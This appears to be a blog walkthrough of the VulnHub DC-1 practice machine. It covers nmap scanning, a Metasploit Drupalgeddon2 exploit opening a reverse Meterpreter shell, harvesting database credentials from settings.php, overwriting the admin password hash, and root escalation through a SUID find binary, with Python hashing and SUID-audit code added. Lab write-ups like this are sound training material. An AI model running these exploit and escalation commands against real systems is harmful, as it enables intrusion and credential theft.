
VulnHub target machine walkthrough: DC-1

Author: varin
Published 2025-09-28 13:20:34
Column: /root/root

Setup

  1. Target download: https://www.vulnhub.com/entry/dc-1,292/#download
  2. Boot: after the download, open VMware, choose File > Open, import the downloaded .ova file, and set the network adapter to NAT mode
  3. Successful boot screen (screenshot)

Scanning

  1. Target subnet: 192.168.29.0/24; attacker IP: 10.196.93.128
  2. Scan with nmap
# -sP is a ping scan (host discovery only)
nmap -sP 192.168.29.0/24
(screenshot)
  1. The target's IP is 192.168.29.131
  2. Run a service and vulnerability scan against the target
# -p port range; -A enables OS detection and version detection (plus default scripts and traceroute); -v more verbose output; -T4 faster timing template
nmap -p 1-65535 -A -v -T4 192.168.29.131
# Scan output:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-02 16:17 CST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 16:17
Completed NSE at 16:17, 0.00s elapsed
Initiating NSE at 16:17
Completed NSE at 16:17, 0.00s elapsed
Initiating NSE at 16:17
Completed NSE at 16:17, 0.00s elapsed
Initiating Ping Scan at 16:17
Scanning 192.168.29.131 [2 ports]
Completed Ping Scan at 16:17, 0.00s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 16:17
Completed Parallel DNS resolution of 1 host. at 16:17, 0.01s elapsed
Initiating Connect Scan at 16:17
Scanning 192.168.29.131 [65535 ports]
Discovered open port 80/tcp on 192.168.29.131
Discovered open port 22/tcp on 192.168.29.131
Discovered open port 111/tcp on 192.168.29.131
Discovered open port 56415/tcp on 192.168.29.131
Completed Connect Scan at 16:17, 4.20s elapsed (65535 total ports)
Initiating Service scan at 16:17
Scanning 4 services on 192.168.29.131
Completed Service scan at 16:18, 11.36s elapsed (4 services on 1 host)
NSE: Script scanning 192.168.29.131.
Initiating NSE at 16:18
Completed NSE at 16:18, 4.12s elapsed
Initiating NSE at 16:18
Completed NSE at 16:18, 0.26s elapsed
Initiating NSE at 16:18
Completed NSE at 16:18, 0.01s elapsed
Nmap scan report for 192.168.29.131
Host is up (0.00074s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
|   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-generator: Drupal 7 (http://drupal.org)
|_http-favicon: Unknown favicon MD5: B6341DFC213100C61DB4FB8775878CEC
|_http-title: Welcome to Drupal Site | Drupal Site
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/ 
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt 
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt 
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          44051/udp   status
|   100024  1          47967/tcp6  status
|   100024  1          48142/udp6  status
|_  100024  1          56415/tcp   status
56415/tcp open  status  1 (RPC #100024)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 16:18
Completed NSE at 16:18, 0.00s elapsed
Initiating NSE at 16:18
Completed NSE at 16:18, 0.00s elapsed
Initiating NSE at 16:18
Completed NSE at 16:18, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.47 seconds
  1. Analysis
    1. Open ports: 22, 80, 111, 56415
    2. Port 80 runs a Drupal web site (the http-generator header reports Drupal 7)

Attack

  1. Visit the site: http://192.168.29.131 (screenshot)
  1. Use MSF (Metasploit) to look for Drupal exploit modules
msfconsole # start the Metasploit console
search drupal # search modules
# Search results
====================================================================================================
Matching Modules

   #  Name                                           Disclosure Date  Rank       Check  Description
   -  ----                                           ---------------  ----       -----  -----------
   0  exploit/unix/webapp/drupal_coder_exec          2016-07-13       excellent  Yes    Drupal CODER Module Remote Command Execution
   1  exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection
   2  exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  No     Drupal HTTP Parameter Key/Value SQL Injection
   3  auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Yes    Drupal OpenID External Entity Injection
   4  exploit/unix/webapp/drupal_restws_exec         2016-07-13       excellent  Yes    Drupal RESTWS Module Remote PHP Code Execution
   5  exploit/unix/webapp/drupal_restws_unserialize  2019-02-20       normal     Yes    Drupal RESTful Web Services unserialize() RCE
   6  auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Yes    Drupal Views Module Users Enumeration
   7  exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution
====================================================================================================


use 1 # use the 2018 module (Drupalgeddon 2)
set Rhost 192.168.29.131 # target IP
set lhost 192.168.29.128 # attacker IP
run # launch
# Output on success
====================================================================================================
[*] Started reverse TCP handler on 192.168.29.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[!] The service is running, but could not be validated.
[*] Sending stage (39927 bytes) to 192.168.29.131
[*] Meterpreter session 1 opened (192.168.29.128:4444 -> 192.168.29.131:38928) at 2024-06-02 16:35:12 +0800
====================================================================================================
  1. Into the target
help # list the available commands

shell # open a shell on the target
# use python to spawn an interactive pty shell
python -c "import pty;pty.spawn('/bin/bash');"
whoami # current user is www-data
cd /home # the home directory contains a flag4 directory with flag4.txt
cat /home/flag4/flag4.txt # reports no permission
# Can you use this same method to find or access the flag in root?
# Probably. But perhaps it's not that easy.  Or maybe it is?


# Analysis: the target runs only a web service, so look at its document root
# Drupal sits on Apache, whose default document root is /var/www
cd /var/www
ls -l
====================================================================================================
www-data@DC-1:/var/www$ ls -l
ls -l
total 168
-rw-r--r--  1 www-data www-data  1481 Nov 21  2013 COPYRIGHT.txt
-rw-r--r--  1 www-data www-data  1451 Nov 21  2013 INSTALL.mysql.txt
-rw-r--r--  1 www-data www-data  1874 Nov 21  2013 INSTALL.pgsql.txt
-rw-r--r--  1 www-data www-data  1298 Nov 21  2013 INSTALL.sqlite.txt
-rw-r--r--  1 www-data www-data 17861 Nov 21  2013 INSTALL.txt
-rwxr-xr-x  1 www-data www-data 18092 Nov  1  2013 LICENSE.txt
-rw-r--r--  1 www-data www-data  8191 Nov 21  2013 MAINTAINERS.txt
-rw-r--r--  1 www-data www-data  5376 Nov 21  2013 README.txt
-rw-r--r--  1 www-data www-data  9642 Nov 21  2013 UPGRADE.txt
-rw-r--r--  1 www-data www-data  6604 Nov 21  2013 authorize.php
-rw-r--r--  1 www-data www-data   720 Nov 21  2013 cron.php
-rw-r--r--  1 www-data www-data    52 Feb 19  2019 flag1.txt
drwxr-xr-x  4 www-data www-data  4096 Nov 21  2013 includes
-rw-r--r--  1 www-data www-data   529 Nov 21  2013 index.php
-rw-r--r--  1 www-data www-data   703 Nov 21  2013 install.php
drwxr-xr-x  4 www-data www-data  4096 Nov 21  2013 misc
drwxr-xr-x 42 www-data www-data  4096 Nov 21  2013 modules
drwxr-xr-x  5 www-data www-data  4096 Nov 21  2013 profiles
-rw-r--r--  1 www-data www-data  1561 Nov 21  2013 robots.txt
drwxr-xr-x  2 www-data www-data  4096 Nov 21  2013 scripts
drwxr-xr-x  4 www-data www-data  4096 Nov 21  2013 sites
drwxr-xr-x  7 www-data www-data  4096 Nov 21  2013 themes
-rw-r--r--  1 www-data www-data 19941 Nov 21  2013 update.php
-rw-r--r--  1 www-data www-data  2178 Nov 21  2013 web.config
-rw-r--r--  1 www-data www-data   417 Nov 21  2013 xmlrpc.php
www-data@DC-1:/var/www$ 
====================================================================================================
# flag1.txt is there
cat flag1.txt
# Every good CMS needs a config file - and so do you. (i.e. go look at the configuration file)
# the config file lives at /var/www/sites/default/settings.php
cd sites/default
cat settings.php # contains flag2 and the database credentials; the hint says brute force isn't the only way in, but you will need access

====================================================================================================
/**
 *
 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
 *
 */
 
$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);
  1. Into the database
mysql -u dbuser -p drupaldb
show databases;
# list all databases in MySQL
# ====================================================================================================

# +--------------------+
# | Database           |
# +--------------------+
# | information_schema |
# | drupaldb           |
# +--------------------+
# 2 rows in set (0.00 sec)
# ====================================================================================================

use drupaldb
show tables;
# list all tables in drupaldb
# ====================================================================================================
# +-----------------------------+
# | Tables_in_drupaldb          |
# +-----------------------------+
# | actions                     |
# | authmap                     |
# | batch                       |
# | block                       |
# | block_custom                |
# | block_node_type             |
# | block_role                  |
# | blocked_ips                 |
# | cache                       |
# | cache_block                 |
# | cache_bootstrap             |
# | cache_field                 |
# | cache_filter                |
# | cache_form                  |
# | cache_image                 |
# | cache_menu                  |
# | cache_page                  |
# | cache_path                  |
# | cache_update                |
# | cache_views                 |
# | cache_views_data            |
# | comment                     |
# | ctools_css_cache            |
# | ctools_object_cache         |
# | date_format_locale          |
# | date_format_type            |
# | date_formats                |
# | field_config                |
# | field_config_instance       |
# | field_data_body             |
# | field_data_comment_body     |
# | field_data_field_image      |
# | field_data_field_tags       |
# | field_revision_body         |
# | field_revision_comment_body |
# | field_revision_field_image  |
# | field_revision_field_tags   |
# | file_managed                |
# | file_usage                  |
# | filter                      |
# | filter_format               |
# | flood                       |
# | history                     |
# | image_effects               |
# | image_styles                |
# | menu_custom                 |
# | menu_links                  |
# | menu_router                 |
# | node                        |
# | node_access                 |
# | node_comment_statistics     |
# | node_revision               |
# | node_type                   |
# | queue                       |
# | rdf_mapping                 |
# | registry                    |
# | registry_file               |
# | role                        |
# | role_permission             |
# | search_dataset              |
# | search_index                |
# | search_node_links           |
# | search_total                |
# | semaphore                   |
# | sequences                   |
# | sessions                    |
# | shortcut_set                |
# | shortcut_set_users          |
# | system                      |
# | taxonomy_index              |
# | taxonomy_term_data          |
# | taxonomy_term_hierarchy     |
# | taxonomy_vocabulary         |
# | url_alias                   |
# | users                       |
# | users_roles                 |
# | variable                    |
# | views_display               |
# | views_view                  |
# | watchdog                    |
# +-----------------------------+
# 80 rows in set (0.00 sec)
# ====================================================================================================
select name ,pass from users;
# ====================================================================================================
# +-------+---------------------------------------------------------+
# | name  | pass                                                    |
# +-------+---------------------------------------------------------+
# |       |                                                         |
# | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR |
# | Fred  | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg |
# +-------+---------------------------------------------------------+
# 3 rows in set (0.00 sec)
# ====================================================================================================
Reference: https://blog.csdn.net/weixin_33345090/article/details/113563493
From the lookup: Drupal 5 and 6 hashed passwords with MD5, whereas Drupal 7 uses a newer hashing scheme, so the password hashes in the target database are clearly not MD5.
The scripts directory under the Drupal 7 installation root contains PHP scripts prepared by the Drupal 7 developers;
password-hash.sh is the one that hashes passwords.
Note: do not cd into the scripts directory before running it, or the script errors out.

php ./scripts/password-hash.sh '123456'>a.txt
cat a.txt
password: 123456                hash: $S$DOUZtHmiwRkJCsB1s3uvwHURm6GhWXWHMc2hcLXe1h.TzuvNIy2r

# replace admin's stored hash with the newly generated one
update users set pass = "$S$DOUZtHmiwRkJCsB1s3uvwHURm6GhWXWHMc2hcLXe1h.TzuvNIy2r" where name = 'admin';
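As an added example (not from the original post, and not Drupal's own source), here is a Python port of the $S$ scheme that password-hash.sh implements and that the pass column above uses: it verifies the hash shown above for '123456', generates a fresh hash the way the script does, and handles the 'U$' prefix Drupal 7 puts on rehashed Drupal 6 MD5 passwords. PAGE_HASH_123456 is the value from the output above; the function names are my own.

```python
import hashlib
import secrets

# Drupal 7 password.inc scheme: "$S$" + one char encoding log2(rounds) + 8-char salt,
# then SHA-512 in Drupal's own base64 alphabet, the whole string cut to 55 characters.
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH, MIN_LOG2, MAX_LOG2 = 55, 7, 30
# Hash copied from the walkthrough above (password-hash.sh run on '123456').
PAGE_HASH_123456 = "$S$DOUZtHmiwRkJCsB1s3uvwHURm6GhWXWHMc2hcLXe1h.TzuvNIy2r"

def b64_encode(data: bytes) -> str:
    """Drupal's phpass-style base64: little-endian 3-byte groups, low 6 bits emitted first."""
    out = []
    for i in range(0, len(data), 3):
        chunk = data[i:i + 3]
        value = int.from_bytes(chunk, "little")
        for shift in range(0, 6 * (len(chunk) + 1), 6):   # 1/2/3 bytes -> 2/3/4 chars
            out.append(ITOA64[(value >> shift) & 0x3F])
    return "".join(out)

def drupal_crypt(password: str, setting: str):
    """Port of _password_crypt('sha512', ...): the stored-hash string, or None for a bad setting."""
    setting = setting[:12]                      # the first 12 chars of a stored hash are its setting
    if len(password) > 512 or len(setting) != 12 or setting[0] != "$" or setting[2] != "$":
        return None
    count_log2 = ITOA64.find(setting[3])        # 'D' is index 15 -> 2**15 rounds
    if not MIN_LOG2 <= count_log2 <= MAX_LOG2:
        return None
    pw = password.encode()
    digest = hashlib.sha512(setting[4:12].encode() + pw).digest()   # salt + password
    for _ in range(1 << count_log2):            # then digest = sha512(digest + password), 2**n times
        digest = hashlib.sha512(digest + pw).digest()
    return (setting + b64_encode(digest))[:HASH_LENGTH]

def hash_password(password: str, count_log2: int = 15, salt: bytes = None) -> str:
    """What password-hash.sh does: a fresh 6-byte salt (8 chars encoded) and 2**15 rounds."""
    salt = secrets.token_bytes(6) if salt is None else salt
    return drupal_crypt(password, "$S$" + ITOA64[count_log2] + b64_encode(salt))

def check_password(password: str, stored: str) -> bool:
    """Port of user_check_password(): 'U$' marks a Drupal 6 MD5 hash that was rehashed in place."""
    if stored.startswith("U$"):
        stored, password = stored[1:], hashlib.md5(password.encode()).hexdigest()
    if not stored.startswith("$S$"):            # "$P$"/"$H$" phpass-MD5 imports are not handled here
        return False
    return drupal_crypt(password, stored) == stored

if __name__ == "__main__":
    print(check_password("123456", PAGE_HASH_123456))   # True: the page's hash verifies
    print(hash_password("123456"))                       # a new, differently salted $S$D... hash
```

Two runs of hash_password() never agree because the salt is random; verification only ever reads the salt back out of the stored string, which is why the UPDATE above works with any freshly generated hash.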
  1. flag3 (screenshot)

Clicking flag3 shows the page (screenshot):

Keywords: perms, find, passwd, -exec
cat /etc/passwd # list the user accounts
# root:x:0:0:root:/root:/bin/bash
# daemon:x:1:1:daemon:/usr/sbin:/bin/sh
# bin:x:2:2:bin:/bin:/bin/sh
# sys:x:3:3:sys:/dev:/bin/sh
# sync:x:4:65534:sync:/bin:/bin/sync
# games:x:5:60:games:/usr/games:/bin/sh
# man:x:6:12:man:/var/cache/man:/bin/sh
# lp:x:7:7:lp:/var/spool/lpd:/bin/sh
# mail:x:8:8:mail:/var/mail:/bin/sh
# news:x:9:9:news:/var/spool/news:/bin/sh
# uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
# proxy:x:13:13:proxy:/bin:/bin/sh
# www-data:x:33:33:www-data:/var/www:/bin/sh
# backup:x:34:34:backup:/var/backups:/bin/sh
# list:x:38:38:Mailing List Manager:/var/list:/bin/sh
# irc:x:39:39:ircd:/var/run/ircd:/bin/sh
# gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
# nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
# libuuid:x:100:101::/var/lib/libuuid:/bin/sh
# Debian-exim:x:101:104::/var/spool/exim4:/bin/false
# statd:x:102:65534::/var/lib/nfs:/bin/false
# messagebus:x:103:107::/var/run/dbus:/bin/false
# sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
# mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false
# flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash
The flag4 account matches what we found at the start: its home is under /home, and reading flag4.txt requires escalating to root.
  1. Privilege escalation
Reference: https://blog.csdn.net/weixin_44912169/article/details/105845909
Reference: https://blog.csdn.net/aobian2884/article/details/101404466?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522171733441116800186510085%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fblog.%2522%257D&request_id=171733441116800186510085&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~blog~first_rank_ecpm_v1~rank_v31_ecpm-1-101404466-null-null.nonecase&utm_term=21&spm=1018.2226.3001.4450
Reference: https://zhuanlan.zhihu.com/p/571759462?utm_id=0
# -exec is followed by a command that find terminates at ';', so the trailing semicolon is mandatory; because ';' is special to the shell on various systems, it is escaped with a backslash
# look for executables with the SUID bit
find / -perm -4000
# www-data@DC-1:/$ find / -perm -4000
# find / -perm -4000
# /bin/mount
# /bin/ping
# /bin/su
# /bin/ping6
# /bin/umount
# /usr/bin/at
# /usr/bin/chsh
# /usr/bin/passwd
# /usr/bin/newgrp
# /usr/bin/chfn
# /usr/bin/gpasswd
# /usr/bin/procmail
# /usr/bin/find
# /usr/sbin/exim4
# /usr/lib/pt_chown
# /usr/lib/openssh/ssh-keysign
# /usr/lib/eject/dmcrypt-get-device
# /usr/lib/dbus-1.0/dbus-daemon-launch-helper
# /sbin/mount.nfs
# find: `/proc/3396/task/3396/ns/net': No such file or directory
# find: `/proc/3396/task/3396/ns/uts': No such file or directory
# find: `/proc/3396/task/3396/ns/ipc': No such file or directory
# find: `/proc/3396/ns/net': No such file or directory
# find: `/proc/3396/ns/uts': No such file or directory
# find: `/proc/3396/ns/ipc': No such file or directory
# find: `/proc/3424/task/3424/ns/net': No such file or directory
# find: `/proc/3424/task/3424/ns/uts': No such file or directory
# find: `/proc/3424/task/3424/ns/ipc': No such file or directory
# find: `/proc/3424/ns/net': No such file or directory
# find: `/proc/3424/ns/uts': No such file or directory
# find: `/proc/3424/ns/ipc': No such file or directory
# find: `/proc/3641/task/3641/ns/net': No such file or directory
# find: `/proc/3641/task/3641/ns/uts': No such file or directory
# find: `/proc/3641/task/3641/ns/ipc': No such file or directory
# find: `/proc/3641/ns/net': No such file or directory
# find: `/proc/3641/ns/uts': No such file or directory
# find: `/proc/3641/ns/ipc': No such file or directory
# find: `/proc/4233/task/4233/fd/6': No such file or directory
# find: `/proc/4233/task/4233/fdinfo/6': No such file or directory
# find: `/proc/4233/fd/6': No such file or directory
# find: `/proc/4233/fdinfo/6': No such file or directory

find itself has the SUID bit, so its -exec option can be used to escalate
# /bin/sh (dash on Debian) keeps the elevated effective uid that SUID find runs with, which is why whoami reports root
www-data@DC-1:/home/flag4$ find flag4.txt -exec '/bin/sh' \;
find flag4.txt -exec '/bin/sh' \;
# whoami
whoami
root
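A defender's counterpart to the SUID hunt above, added here and not part of the original post: it parses the kind of `find / -perm -4000` output shown above (a constructed excerpt), can walk a live filesystem to collect SUID files, and diffs the result against a recorded baseline so that a stray SUID find stands out. The baseline set, the sample text and the function names are assumptions of this example.

```python
import os
import stat

# Constructed sample: an excerpt of the `find / -perm -4000` output shown above,
# including the diagnostics find prints for /proc entries that vanished mid-scan.
SAMPLE_FIND_OUTPUT = """\
/bin/mount
/bin/su
/usr/bin/passwd
/usr/bin/find
/usr/sbin/exim4
find: `/proc/3396/task/3396/ns/net': No such file or directory
"""

# Assumed baseline: the page's own SUID list with /usr/bin/find removed, since find is
# never SUID by default. Record a real baseline with scan_suid() on a clean reference
# image of the same distribution rather than trusting this set.
BASELINE_SUID = {
    "/bin/mount", "/bin/ping", "/bin/ping6", "/bin/su", "/bin/umount", "/usr/bin/at",
    "/usr/bin/chfn", "/usr/bin/chsh", "/usr/bin/gpasswd", "/usr/bin/newgrp",
    "/usr/bin/passwd", "/usr/bin/procmail", "/usr/sbin/exim4", "/usr/lib/pt_chown",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper", "/sbin/mount.nfs",
}
PSEUDO_FS = ("/proc", "/sys", "/dev")

def parse_find_output(text: str) -> set:
    """Keep the path lines of `find / -perm -4000` output; drop its 'find: ...' diagnostics."""
    return {line.strip() for line in text.splitlines() if line.startswith("/")}

def scan_suid(root: str = "/") -> set:
    """Live equivalent of `find / -perm -4000 -type f`: regular files with the SUID bit set."""
    found = set()
    for dirpath, dirnames, filenames in os.walk(root):
        if dirpath in PSEUDO_FS:          # nothing to audit there, and it only produces noise
            dirnames[:] = []
            continue
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)       # lstat: do not follow symlinks into other trees
            except OSError:
                continue                  # raced with a deleted file, or unreadable
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.add(path)
    return found

def unexpected_suid(present: set, baseline: set = BASELINE_SUID) -> list:
    """SUID files not in the baseline; on DC-1 this is exactly /usr/bin/find."""
    return sorted(present - baseline)

if __name__ == "__main__":
    print(unexpected_suid(parse_find_output(SAMPLE_FIND_OUTPUT)))   # ['/usr/bin/find']
```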
  1. flag5
# look for the flag file
find / -name '*flag.txt'
# result:
# /root/thefinalflag.txt

cat /root/thefinalflag.txt

# result:
# Well done!!!!
# Hopefully you've enjoyed this and learned some new skills.
# You can let me know what you thought of this little journey
# by contacting me via Twitter - @DCAU7

Done.

Originally published: 2024-06-05
